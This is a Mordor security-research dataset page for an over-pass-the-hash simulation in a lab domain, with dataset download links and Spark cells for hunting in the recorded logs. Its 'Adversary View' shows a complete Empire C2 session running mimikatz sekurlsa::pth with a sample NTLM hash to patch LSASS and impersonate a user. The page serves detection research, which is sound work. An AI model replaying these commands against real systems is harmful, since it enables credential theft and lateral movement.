# Empire Over-Pass-The-Hash

## Metadata


|                   |    |
|:------------------|:---|
| Author            | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date     | 2019/03/19 |
| Modification Date | 2020/09/20 |
| Tactics           | ['[TA0005](https://attack.mitre.org/tactics/TA0005)', '[TA0008](https://attack.mitre.org/tactics/TA0008)'] |
| Techniques        | ['[T1550.002](https://attack.mitre.org/techniques/T1550/002)'] |
| Tags              | ['Over-Pass-The-Hash', 'Patching LSASS'] |

## Dataset Description
This dataset represents adversaries taking a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a fully-fledged Kerberos TGT. In this case, an adversary can write the hash/key into an existing logon session (i.e. a sacrificial logon session) section in the memory content of LSASS and kick off the regular Kerberos authentication process.

## Datasets Downloads


| Dataset Type | Link   |
|:-------------|:-------|
| Host | [https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_over_pth_patch_lsass.zip](https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_over_pth_patch_lsass.zip) |

## Notebooks
Notebooks created by the community leveraging the mordor datasets


| Author | Name | Link |
|:-------|:-----|:-----|

## Simulation Plan


| Environment | Tool Type | Module |
|:------------|:----------|:-------|
| Mordor shire | C2 | [mimikataz_pth](https://github.com/OTRF/Blacksmith/blob/master/aws/mordor/cfn-files/scripts/Invoke-Mimikatz.ps1) |

## Adversary View
```
(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            

(Empire: agents) > interact 4EH9PC5S
(Empire: 4EH9PC5S) > 
(Empire: 4EH9PC5S) > usemodule credentials/mimikatz/pth*
(Empire: powershell/credentials/mimikatz/pth) > info

              Name: Invoke-Mimikatz PTH
            Module: powershell/credentials/mimikatz/pth
        NeedsAdmin: True
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to execute
  sekurlsa::pth to create a new process. with a specific
  user's hash. Use credentials/tokens to steal the token
  afterwards.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com
  http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-
  hash-with-mimikatz/

Options:

  Name   Required    Value                     Description
  ----   --------    -------                   -----------
  Agent  True        4EH9PC5S                  Agent to run module on.                 
  CredID False                                 CredID from the store to use for ticket 
                                              creation.                               
  user   False                                 Username to impersonate.                
  domain False                                 The fully qualified domain name.        
  ntlm   False                                 The NTLM hash to use.                   

(Empire: powershell/credentials/mimikatz/pth) > set ntlm 81d310fa34e6a56a31145445891bb7b8
(Empire: powershell/credentials/mimikatz/pth) > set user pgustavo
(Empire: powershell/credentials/mimikatz/pth) > set domain theshire.local
(Empire: powershell/credentials/mimikatz/pth) > execute
[*] Tasked 4EH9PC5S to run TASK_CMD_JOB
[*] Agent 4EH9PC5S tasked with task ID 1
[*] Tasked agent 4EH9PC5S to run module powershell/credentials/mimikatz/pth
(Empire: powershell/credentials/mimikatz/pth) > 
Job started: 1WCLFA

Hostname: WORKSTATION6.theshire.local / S-1-5-21-4228717743-1032521047-1810997296

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # sekurlsa::pth /user:pgustavo /domain:theshire.local /ntlm:81d310fa34e6a56a31145445891bb7b8
user    : pgustavo
domain  : theshire.local
program : cmd.exe
impers. : no
NTLM    : 81d310fa34e6a56a31145445891bb7b8
  |  PID  3148
  |  TID  6488
  |  LSA Process is now R/W
  |  LUID 0 ; 69262895 (00000000:0420de2f)
  \_ msv1_0   - data copy @ 000001C7E0166C80 : OK !
  \_ kerberos - data copy @ 000001C7E02B1268
  \_ aes256_hmac       -> null             
  \_ aes128_hmac       -> null             
  \_ rc4_hmac_nt       OK
  \_ rc4_hmac_old      OK
  \_ rc4_md4           OK
  \_ rc4_hmac_nt_exp   OK
  \_ rc4_hmac_old_exp  OK
  \_ *Password replace @ 000001C7E01AEDE8 (32) -> null

Use credentials/token to steal the token of the created PID.
```

## Explore Mordor Dataset

### Initialize Analytics Engine

In [ ]:
from openhunt.mordorutils import *
spark = get_spark()

### Download & Process Mordor File

In [ ]:
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_over_pth_patch_lsass.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

### Get to know your data

In [ ]:
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)